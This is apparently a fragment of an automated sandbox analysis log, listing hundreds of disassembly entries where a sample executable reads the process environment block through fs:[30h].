          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A40050 mov eax, dword ptr fs:[00000030h]2_2_00A40050
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A561A0 mov eax, dword ptr fs:[00000030h]2_2_00A561A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A561A0 mov eax, dword ptr fs:[00000030h]2_2_00A561A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]2_2_00AE49A4
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]2_2_00AE49A4
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]2_2_00AE49A4
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]2_2_00AE49A4
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA69A6 mov eax, dword ptr fs:[00000030h]2_2_00AA69A6
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]2_2_00AA51BE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]2_2_00AA51BE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]2_2_00AA51BE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]2_2_00AA51BE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A185 mov eax, dword ptr fs:[00000030h]2_2_00A5A185
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C182 mov eax, dword ptr fs:[00000030h]2_2_00A4C182
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52990 mov eax, dword ptr fs:[00000030h]2_2_00A52990
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A2B1E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A2B1E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A2B1E1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AB41E8 mov eax, dword ptr fs:[00000030h]2_2_00AB41E8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov ecx, dword ptr fs:[00000030h]2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5513A mov eax, dword ptr fs:[00000030h]2_2_00A5513A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5513A mov eax, dword ptr fs:[00000030h]2_2_00A5513A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]2_2_00A29100
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]2_2_00A29100
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]2_2_00A29100
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C962 mov eax, dword ptr fs:[00000030h]2_2_00A2C962
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B171 mov eax, dword ptr fs:[00000030h]2_2_00A2B171
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B171 mov eax, dword ptr fs:[00000030h]2_2_00A2B171
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4B944 mov eax, dword ptr fs:[00000030h]2_2_00A4B944
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4B944 mov eax, dword ptr fs:[00000030h]2_2_00A4B944
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]2_2_00A252A5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]2_2_00A252A5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]2_2_00A252A5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]2_2_00A252A5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A252A5 mov eax, dword ptr fs:[00000030h]2_2_00A252A5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A3AAB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A3AAB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]2_2_00A5FAB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5D294 mov eax, dword ptr fs:[00000030h]2_2_00A5D294
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5D294 mov eax, dword ptr fs:[00000030h]2_2_00A5D294
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52AE4 mov eax, dword ptr fs:[00000030h]2_2_00A52AE4
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52ACB mov eax, dword ptr fs:[00000030h]2_2_00A52ACB
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A64A2C mov eax, dword ptr fs:[00000030h]2_2_00A64A2C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A64A2C mov eax, dword ptr fs:[00000030h]2_2_00A64A2C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A38A0A mov eax, dword ptr fs:[00000030h]2_2_00A38A0A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]2_2_00A25210
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov ecx, dword ptr fs:[00000030h]2_2_00A25210
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]2_2_00A25210
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A25210 mov eax, dword ptr fs:[00000030h]2_2_00A25210
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AA16 mov eax, dword ptr fs:[00000030h]2_2_00A2AA16
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AA16 mov eax, dword ptr fs:[00000030h]2_2_00A2AA16
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A43A1C mov eax, dword ptr fs:[00000030h]2_2_00A43A1C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]2_2_00AEAA16
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEAA16 mov eax, dword ptr fs:[00000030h]2_2_00AEAA16
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADB260 mov eax, dword ptr fs:[00000030h]2_2_00ADB260
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADB260 mov eax, dword ptr fs:[00000030h]2_2_00ADB260
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8A62 mov eax, dword ptr fs:[00000030h]2_2_00AF8A62
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6927A mov eax, dword ptr fs:[00000030h]2_2_00A6927A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]2_2_00A29240
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]2_2_00A29240
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]2_2_00A29240
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29240 mov eax, dword ptr fs:[00000030h]2_2_00A29240
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEEA55 mov eax, dword ptr fs:[00000030h]2_2_00AEEA55
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AB4257 mov eax, dword ptr fs:[00000030h]2_2_00AB4257
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]2_2_00A54BAD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]2_2_00A54BAD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54BAD mov eax, dword ptr fs:[00000030h]2_2_00A54BAD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]2_2_00AF5BA5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE138A mov eax, dword ptr fs:[00000030h]2_2_00AE138A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A31B8F mov eax, dword ptr fs:[00000030h]2_2_00A31B8F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A31B8F mov eax, dword ptr fs:[00000030h]2_2_00A31B8F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADD380 mov ecx, dword ptr fs:[00000030h]2_2_00ADD380
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52397 mov eax, dword ptr fs:[00000030h]2_2_00A52397
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5B390 mov eax, dword ptr fs:[00000030h]2_2_00A5B390
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A503E2 mov eax, dword ptr fs:[00000030h]2_2_00A503E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]2_2_00A4DBE9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA53CA mov eax, dword ptr fs:[00000030h]2_2_00AA53CA
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA53CA mov eax, dword ptr fs:[00000030h]2_2_00AA53CA
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE131B mov eax, dword ptr fs:[00000030h]2_2_00AE131B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]2_2_00A2DB60
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A53B7A mov eax, dword ptr fs:[00000030h]2_2_00A53B7A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A53B7A mov eax, dword ptr fs:[00000030h]2_2_00A53B7A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2DB40 mov eax, dword ptr fs:[00000030h]2_2_00A2DB40
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8B58 mov eax, dword ptr fs:[00000030h]2_2_00AF8B58
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2F358 mov eax, dword ptr fs:[00000030h]2_2_00A2F358
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3849B mov eax, dword ptr fs:[00000030h]2_2_00A3849B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE14FB mov eax, dword ptr fs:[00000030h]2_2_00AE14FB
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]2_2_00AA6CF0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]2_2_00AA6CF0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]2_2_00AA6CF0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]2_2_00AF8CD6
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5BC2C mov eax, dword ptr fs:[00000030h]2_2_00A5BC2C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]2_2_00AA6C0A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]2_2_00AA6C0A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]2_2_00AA6C0A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6C0A mov eax, dword ptr fs:[00000030h]2_2_00AA6C0A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]2_2_00AF740D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]2_2_00AF740D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF740D mov eax, dword ptr fs:[00000030h]2_2_00AF740D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1C06 mov eax, dword ptr fs:[00000030h]2_2_00AE1C06
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4746D mov eax, dword ptr fs:[00000030h]2_2_00A4746D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A44B mov eax, dword ptr fs:[00000030h]2_2_00A5A44B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABC450 mov eax, dword ptr fs:[00000030h]2_2_00ABC450
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABC450 mov eax, dword ptr fs:[00000030h]2_2_00ABC450
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF05AC mov eax, dword ptr fs:[00000030h]2_2_00AF05AC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF05AC mov eax, dword ptr fs:[00000030h]2_2_00AF05AC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A535A1 mov eax, dword ptr fs:[00000030h]2_2_00A535A1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]2_2_00A51DB5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]2_2_00A51DB5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A51DB5 mov eax, dword ptr fs:[00000030h]2_2_00A51DB5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581 mov eax, dword ptr fs:[00000030h]2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]2_2_00A22D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]2_2_00A22D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]2_2_00A22D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]2_2_00A22D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A22D8A mov eax, dword ptr fs:[00000030h]2_2_00A22D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FD9B mov eax, dword ptr fs:[00000030h]2_2_00A5FD9B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5FD9B mov eax, dword ptr fs:[00000030h]2_2_00A5FD9B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A3D5E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A3D5E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]2_2_00AEFDE2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]2_2_00AEFDE2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]2_2_00AEFDE2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]2_2_00AEFDE2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]2_2_00AD8DF1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]2_2_00AA6DC9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2AD30 mov eax, dword ptr fs:[00000030h]2_2_00A2AD30
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A33D34 mov eax, dword ptr fs:[00000030h]2_2_00A33D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEE539 mov eax, dword ptr fs:[00000030h]2_2_00AEE539
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8D34 mov eax, dword ptr fs:[00000030h]2_2_00AF8D34
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AAA537 mov eax, dword ptr fs:[00000030h]2_2_00AAA537
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]2_2_00A54D3B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]2_2_00A54D3B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A54D3B mov eax, dword ptr fs:[00000030h]2_2_00A54D3B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]2_2_00A4C577
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C577 mov eax, dword ptr fs:[00000030h]2_2_00A4C577
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A63D43 mov eax, dword ptr fs:[00000030h]2_2_00A63D43
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3540 mov eax, dword ptr fs:[00000030h]2_2_00AA3540
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AD3D40 mov eax, dword ptr fs:[00000030h]2_2_00AD3D40
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A47D50 mov eax, dword ptr fs:[00000030h]2_2_00A47D50
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AF0EA5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AF0EA5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AF0EA5
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA46A7 mov eax, dword ptr fs:[00000030h]2_2_00AA46A7
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABFE87 mov eax, dword ptr fs:[00000030h]2_2_00ABFE87
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A376E2 mov eax, dword ptr fs:[00000030h]2_2_00A376E2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A516E0 mov ecx, dword ptr fs:[00000030h]2_2_00A516E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A68EC7 mov eax, dword ptr fs:[00000030h]2_2_00A68EC7
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A536CC mov eax, dword ptr fs:[00000030h]2_2_00A536CC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]2_2_00ADFEC0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]2_2_00AF8ED6
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2E620 mov eax, dword ptr fs:[00000030h]2_2_00A2E620
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ADFE3F mov eax, dword ptr fs:[00000030h]2_2_00ADFE3F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]2_2_00A2C600
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C600 mov eax, dword ptr fs:[00000030h]2_2_00A2C600
